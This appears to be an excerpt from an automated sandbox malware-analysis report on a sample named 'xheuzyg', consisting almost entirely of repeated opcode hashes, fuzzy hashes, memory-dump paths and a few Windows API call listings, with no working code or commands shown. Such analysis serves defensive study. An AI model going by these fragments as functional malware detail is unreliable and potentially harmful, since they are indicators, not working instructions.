                                                                                                                                                                  • API String ID: 0-3343787489
                                                                                                                                                                  • Opcode ID: c077a1bc44d6a1329e9727fde2ee99480905231e16689b545328ce5d56835e8b
                                                                                                                                                                  • Instruction ID: 5976124a9dc59a014d9d68687fa376a8a23cf36b6abafeb928ef0a733691ca1b
                                                                                                                                                                  • Opcode Fuzzy Hash: c077a1bc44d6a1329e9727fde2ee99480905231e16689b545328ce5d56835e8b
                                                                                                                                                                  • Instruction Fuzzy Hash: 34C1D7B1940308AADB14DBF0CCC1FEF777DAF44708F40455EB2595B182DA79A684CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 795033158feafd5bb551028d442398c6d5f51e3c91affe4be5a042f5a03a683f
                                                                                                                                                                  • Instruction ID: 43352cb06590b6197c795f03bb1025e23323fe1085459a684a18171f4860b4a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 795033158feafd5bb551028d442398c6d5f51e3c91affe4be5a042f5a03a683f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6690023264580013914075584C845475009A7E1301B59C011E4424654DCB148A565361
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c4fe7ea89e801952effa1f568acf7935cc2dfb0bf85438b976596d10208a35d7
                                                                                                                                                                  • Instruction ID: 18703bcaf1b89313a41da8e41fb93610350b2a0379d785365adbaa11b4e54144
                                                                                                                                                                  • Opcode Fuzzy Hash: c4fe7ea89e801952effa1f568acf7935cc2dfb0bf85438b976596d10208a35d7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4190026264150043414075584C044077009A7E2301399C115A4554660DC71889559369
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d90b03f5e343881cb97d41d00dae5f81c154732b2b0d672008dc8c81c7bd8b91
                                                                                                                                                                  • Instruction ID: b1c75b7f68c6f863c42d894078da42f817f384b16653ae50bf209671c4d934dc
                                                                                                                                                                  • Opcode Fuzzy Hash: d90b03f5e343881cb97d41d00dae5f81c154732b2b0d672008dc8c81c7bd8b91
                                                                                                                                                                  • Instruction Fuzzy Hash: 8190023224544843D14075584804A47101997D1305F59C011A4064794ED7258E55B761
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5a36f6104f21b1d22927b2b3dda07a6d8891d7bb3aa5b7632dd77f00406f0ac0
                                                                                                                                                                  • Instruction ID: 72e71c0d6aca83e5236561fc3865eae6f045c6d16cecbbd54f5f24cd9b1e097a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a36f6104f21b1d22927b2b3dda07a6d8891d7bb3aa5b7632dd77f00406f0ac0
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A90023264540803D15075584814747100997D1301F59C011A4024754EC7558B5577A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6a58f1748631f70e27cda54d5a28f48e9ba3246abdf3996852f848621f8e98fa
                                                                                                                                                                  • Instruction ID: d20f31d17cb7ae1ced29001caa4d72d5f0bec450f48d4db76c7f426f6f6f9825
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a58f1748631f70e27cda54d5a28f48e9ba3246abdf3996852f848621f8e98fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F90023224140803D10475584C04687100997D1301F59C011AA024755FD76589917231
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 89f87872fc6683a36d521c8efa6439a347c7e1e37901f3cac7c3ac7dce261828
                                                                                                                                                                  • Instruction ID: 1336a73802e8374770f750261a9508be62137e96eba39bfad5fa69d9aacecb07
                                                                                                                                                                  • Opcode Fuzzy Hash: 89f87872fc6683a36d521c8efa6439a347c7e1e37901f3cac7c3ac7dce261828
                                                                                                                                                                  • Instruction Fuzzy Hash: C4900226261400030145B9580A0450B1449A7D7351399C015F5416690DC72189655321
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1f34aed9e6f46176822606ff4006acedc227d523745cd208c2cec5344e083658
                                                                                                                                                                  • Instruction ID: 7a184f935994be281880d7bf9e09d9569f549a2ac49bbb88a2952a0bb5f75529
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f34aed9e6f46176822606ff4006acedc227d523745cd208c2cec5344e083658
                                                                                                                                                                  • Instruction Fuzzy Hash: 389002A2241540934500B6588804B0B550997E1201B59C016E5054660DC62589519235
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 73f3c132ee395b5e18f613850a73c8f9262955bb54bf3c727d11ce2a8f3b3536
                                                                                                                                                                  • Instruction ID: 148fe9e8e3a0f531a8a957cf7fab785e235b46e8e33e4508e0632fff5d6c20b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 73f3c132ee395b5e18f613850a73c8f9262955bb54bf3c727d11ce2a8f3b3536
                                                                                                                                                                  • Instruction Fuzzy Hash: CE90022224544443D10079585808A07100997D1205F59D011A5064695EC7358951A231
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d57df7938afe1875a85c93ad3460925a241c40b41b6941e7e1f59fd9558a99dd
                                                                                                                                                                  • Instruction ID: f13849e3b431b0f1928a2f2d7f7a62695a5e77f5c000d4b687f0ce9b54bfd6d7
                                                                                                                                                                  • Opcode Fuzzy Hash: d57df7938afe1875a85c93ad3460925a241c40b41b6941e7e1f59fd9558a99dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0990023228140403D14175584804607100DA7D1241F99C012A4424654FC7558B56AB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 61a8ada56f275121f0a60f40b066a6d1a51f2f4fb22044cb6a5e1206413c855a
                                                                                                                                                                  • Instruction ID: 6e13fbaf6c6a2d8eefad81c909210b1b6c5d7ab335da140179bd81b36833a1db
                                                                                                                                                                  • Opcode Fuzzy Hash: 61a8ada56f275121f0a60f40b066a6d1a51f2f4fb22044cb6a5e1206413c855a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1490023224140843D10075584804B47100997E1301F59C016A4124754EC715C9517621
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b14ac2b46001d84eceeb3f17fd5c2955f4a9eaec1f546f38b6fbe3db00c5d735
                                                                                                                                                                  • Instruction ID: a7ff4523255e7786eaaa4014b977583ff6300c5b41c38de0955e6fdd22d1e5f7
                                                                                                                                                                  • Opcode Fuzzy Hash: b14ac2b46001d84eceeb3f17fd5c2955f4a9eaec1f546f38b6fbe3db00c5d735
                                                                                                                                                                  • Instruction Fuzzy Hash: B090023224140403D10075585908707100997D1201F59D411A4424658ED75689516221
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c680581a50df308caecaa8d58235485850d31b506d9998425d68a7dfa3487e84
                                                                                                                                                                  • Instruction ID: d204169d6544bd907ae46a7226a13cd70d4130c6e128aa759cb86b23a1bcf16e
                                                                                                                                                                  • Opcode Fuzzy Hash: c680581a50df308caecaa8d58235485850d31b506d9998425d68a7dfa3487e84
                                                                                                                                                                  • Instruction Fuzzy Hash: 4390022264540403D14075585818707101997D1201F59D011A4024654EC7598B5567A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 756cc43115f945e1dda9b2d20ae1725d57b716ad93381937486fc716ad8e9931
                                                                                                                                                                  • Instruction ID: f776b7874ce40c909789aceb0c35ee7ee2abc5a2803d2eca7e3dce20380c3eab
                                                                                                                                                                  • Opcode Fuzzy Hash: 756cc43115f945e1dda9b2d20ae1725d57b716ad93381937486fc716ad8e9931
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F90026225140043D10475584804707104997E2201F59C012A6154654DC6298D615225
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5b5d36fcea1fdc34006c6b14e8631b913dc7adb58d00d8a847b8c6d7d4f733da
                                                                                                                                                                  • Instruction ID: d0e85feda686efa625b23462537074722a085398efc58fc6f5a5ca64b69e6c23
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b5d36fcea1fdc34006c6b14e8631b913dc7adb58d00d8a847b8c6d7d4f733da
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B90023224180403D10075584C08747100997D1302F59C011A9164655FC765C9916631
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a748b47f06dcf9bf32a1324d90614500ed62acd62bea3566e96a6bb26818a189
                                                                                                                                                                  • Instruction ID: 6bba7170a3013650abc14e1ee03a45ed09adf7096cbaf8f12ccc7fc1cbaf7677
                                                                                                                                                                  • Opcode Fuzzy Hash: a748b47f06dcf9bf32a1324d90614500ed62acd62bea3566e96a6bb26818a189
                                                                                                                                                                  • Instruction Fuzzy Hash: D690022234140403D10275584814607100DD7D2345F99C012E5424655EC7258A53A232
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 57f52bcf53493c53e2e84c1f1b7f7d0bd4c3a0d3c979e939646b634b4b9d2b4f
                                                                                                                                                                  • Instruction ID: ae57f9401979242b2d63bfdba29f682d11e599700eee161964e35a1716e6ca40
                                                                                                                                                                  • Opcode Fuzzy Hash: 57f52bcf53493c53e2e84c1f1b7f7d0bd4c3a0d3c979e939646b634b4b9d2b4f
                                                                                                                                                                  • Instruction Fuzzy Hash: C890026224180403D14079584C04607100997D1302F59C011A6064655FCB298D516235
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 281e470baecee765fcc52f6668c2c4bd419e6108638e5dfdad716b79c0408766
                                                                                                                                                                  • Instruction ID: 149ae156d05f7d8ff45826c317c18315a955f4f1fe07a40ed724343235ca7f69
                                                                                                                                                                  • Opcode Fuzzy Hash: 281e470baecee765fcc52f6668c2c4bd419e6108638e5dfdad716b79c0408766
                                                                                                                                                                  • Instruction Fuzzy Hash: 1890022224184443D14076584C04B0F510997E2202F99C019A8156654DCA1589555721
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e8eb68987f76c1db087c8ef8d20832f280e2a7e978898b34639eee9ebbc23362
                                                                                                                                                                  • Instruction ID: 26be3f3b836d4d14111a0d638b9dcf524480151103e6efac59e2b8e8daf563ca
                                                                                                                                                                  • Opcode Fuzzy Hash: e8eb68987f76c1db087c8ef8d20832f280e2a7e978898b34639eee9ebbc23362
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F90022228140803D14075588814707100AD7D1601F59C011A4024654EC7168A6567B1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e826d21c76f451d70591cd93e344570f240ba4743670df1f3ad18253ac38f3e2
                                                                                                                                                                  • Instruction ID: b0ba4fc30de026a9db0b7f761c5e6f020c023be6ae16de66b35ce6b7d25f6a5d
                                                                                                                                                                  • Opcode Fuzzy Hash: e826d21c76f451d70591cd93e344570f240ba4743670df1f3ad18253ac38f3e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B90023264550403D10075584914707200997D1201F69C411A4424668EC7958A5166A2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bbe2b667a808b952923adde92d8351347045006a09bff7bd29e3d05dfddf7e2d
                                                                                                                                                                  • Instruction ID: 6af500020fcc3ef20c88e21ee43ceeda0db62908f732ad38ccb93a9ed87e78f8
                                                                                                                                                                  • Opcode Fuzzy Hash: bbe2b667a808b952923adde92d8351347045006a09bff7bd29e3d05dfddf7e2d
                                                                                                                                                                  • Instruction Fuzzy Hash: EB90022228545103D150755C48046175009B7E1201F59C021A4814694EC65589556321
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 331ad40aa3f253e4bd6163554c939955f36f9f411ee98ae329d3521766484f48
                                                                                                                                                                  • Instruction ID: 734b2cd0ce65b6f2efef9f678b90ba6b343c7d5bb09e49eb7ac5591b9fb68f9d
                                                                                                                                                                  • Opcode Fuzzy Hash: 331ad40aa3f253e4bd6163554c939955f36f9f411ee98ae329d3521766484f48
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E90023624140403D51075585C04647104A97D1301F59D411A4424658EC75489A1A221
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 796358a95fcee17fcc731bef045354403a8a99fd927b8ed484e483b91b2052ce
                                                                                                                                                                  • Instruction ID: a1f0824cc9e9b47efcd99dd3f5e4fcd6be7ccdc40638ca524c247125b93e5ca5
                                                                                                                                                                  • Opcode Fuzzy Hash: 796358a95fcee17fcc731bef045354403a8a99fd927b8ed484e483b91b2052ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A90023224240143954076585C04A4F510997E2302B99D415A4015654DCA1489615321
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                  • Instruction ID: cd7b209780561a80ae83f8247581624f21ba080d7a960183e7c449feaa26e915
                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001C69C1: CreateFileW.KERNEL32(?,00000000,?,001C6DB4,?,?,00000000,?,001C6DB4,?,0000000C), ref: 001C69DE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6E1F
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6E26
                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 001C6E32
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6E3C
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6E45
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 001C6E65
                                                                                                                                                                  • CloseHandle.KERNEL32(001BE51F), ref: 001C6FB2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6FE4
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6FEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                  • String ID: H
                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                  • Opcode ID: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
                                                                                                                                                                  • Instruction ID: 9633f124ea54769ff564c0340860c861f182b8c755d8d5d09d6519315a9ebdce
                                                                                                                                                                  • Opcode Fuzzy Hash: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
                                                                                                                                                                  • Instruction Fuzzy Hash: 84A12436A041549FCF1DEF68DCA1FAE3BA1AB26324F18015EF8429F291CB35D852CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                  • Opcode ID: 1fc9efab19de210a3bd2114c3d662ec985a69dc19fb9560155636c723bbd61e0
                                                                                                                                                                  • Instruction ID: 78892f9d84c9ee08aa113fb950b5b2dfa8f5613120964f77b4a5be21954ae8a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc9efab19de210a3bd2114c3d662ec985a69dc19fb9560155636c723bbd61e0
                                                                                                                                                                  • Instruction Fuzzy Hash: E751F4B6A00116AFCB16DBAD8CA497FFBB8BF48240714826DF5A5D7681D334DE4487A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                  • Opcode ID: 1a2e261776f3ccaafadd9c6fd8b0544dde50905ccf1e7b76666acae41efd7c55
